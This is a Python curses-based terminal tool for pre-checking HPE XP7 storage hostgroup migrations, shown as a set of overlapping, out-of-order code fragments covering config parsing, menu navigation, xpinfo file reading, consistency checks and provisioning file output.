"window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel =",
":\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict)",
"break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict",
"XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration",
"get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill",
"for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate()",
"Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win =",
"items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end",
"### clear screen ### stdscr.clear() ### check window heigth and width ### if",
"### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ###",
"select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object):",
"dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir",
"as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8:",
"= {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging",
"else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if",
"= {}\".format(self.position,n )) ### adjust slice ### if n < 0: if self.position",
"if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start =",
"{\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1)",
"self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up",
"PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey()",
"sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu",
"+= n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start +",
"import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict =",
"- self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice",
"hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item =",
"in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr",
"curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[]",
"self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start = 0",
"else: err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\"",
"in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1:",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item)",
"self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window =",
"def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a dict",
"defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined,",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in",
"self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if",
"self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate ::",
"= 0 def navigate(self,n): self.position += n if self.position < 0: self.position =",
"self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide()",
"{} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known",
"cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section",
"= 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir =",
"= 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update the",
"class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel =",
"line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr()",
"for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] =",
"= selection self.search = search def update(self): \"\"\" update the selection items list",
"= 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n",
"exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name #####################",
"= Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse",
"self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files",
"VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict =",
"self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ###",
"def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection =",
"for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode",
"self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\"))",
"mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1]",
"search def update(self): \"\"\" update the selection items list to match the new",
"clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr):",
"if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start =",
"selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding",
"ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for",
"hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for boxpair_name",
"- 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0",
"self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key",
"= int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"):",
"= value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\")",
"in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\")",
"= len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start <",
"= stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win =",
"self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end =",
"for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode",
"navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start += n if",
"hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else:",
"TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search",
"key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) -",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif",
"= self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply =",
"a view on the items which fits in the window ### self.slice_start =",
"{}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate()",
"this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection =",
"mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {},",
"##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\")",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in",
"box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile",
"{} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ###",
"self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide",
"= 100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict =",
"self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position +=",
"self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice down",
"= self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0",
"def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n if",
"to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now",
"if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in",
"during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what",
"# logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index <=",
"index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8])",
"hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name",
": <NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0 Initial",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object =",
"for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ###",
"in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else:",
"= 0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end",
"{}\".format(self.position,n )) ### adjust slice ### if n < 0: if self.position -",
"20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ###",
"- 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to",
"### select hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()):",
"= box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger =",
"= ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing",
"= xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo",
"else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear()",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr):",
"to the selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO",
"except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr",
"NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir:",
"0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0",
"logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for",
"len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end += n if self.slice_end",
"search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ###",
"self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end - self.position",
"self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name)",
"logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter)",
"input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ###",
"result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list",
"in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ###",
"__init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel =",
"self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def",
"in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile =",
"self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display()",
"migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR framework",
"def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0",
"match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update",
"if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"[curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get():",
"copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which fits in",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection =",
"= window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show",
"temporary horcm file and daemon to pairdisplay & check on status #################################################################################################### \"\"\"",
"100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict = {}",
"self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict =",
"collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg",
"show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show",
"== curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() ####################################################################################################",
"= items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the",
"cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\")",
"new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by",
"{}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif",
"self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end += n",
"instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in",
"logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL",
"self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line",
"sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()]",
"curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object):",
"after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class",
"write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh &",
"if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for",
"- self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the",
"logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line",
"= self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ###",
">= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n",
"pairdisplay & check on status #################################################################################################### \"\"\" import curses from curses import panel",
"< 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n >",
"#################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width =",
"title self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1])",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str",
"self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index ==",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window",
"### slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) -",
"= curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >=",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg",
"### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search",
"log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log",
"logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s",
"/ StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version 1.1",
"= cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {}",
"= box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] =",
"dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir",
"= 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position",
"out to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if",
"self.selection = selection def update(self): \"\"\" update the list of xpinfo files present",
"cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level",
"BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = []",
"and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end +=",
"main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov =",
"\"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No",
"self.search = search def update(self): \"\"\" update the selection items list to match",
"provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch()",
"of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f",
"len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end",
"in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set()",
"elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position =",
"self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line = \"{}:",
"### slide slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items) -",
"selection def update(self): \"\"\" update the list of xpinfo files present \"\"\" if",
": {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line =",
"if self.position < 0: self.position = 0 elif self.position >= len(self.items): self.position =",
"collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size",
"box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result:",
"in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu =",
"self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in",
"serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict = {} box_dict",
"TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{}",
"site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for box {},",
"self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list = []",
"or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0)",
"InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups",
"import ConfigParser import sys import os import os.path import csv import string import",
"self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str =",
"main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()):",
"### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index",
"self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in",
"< 0: if self.position - self.slice_start < 2 and self.slice_start >= 1: ###",
"boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict:",
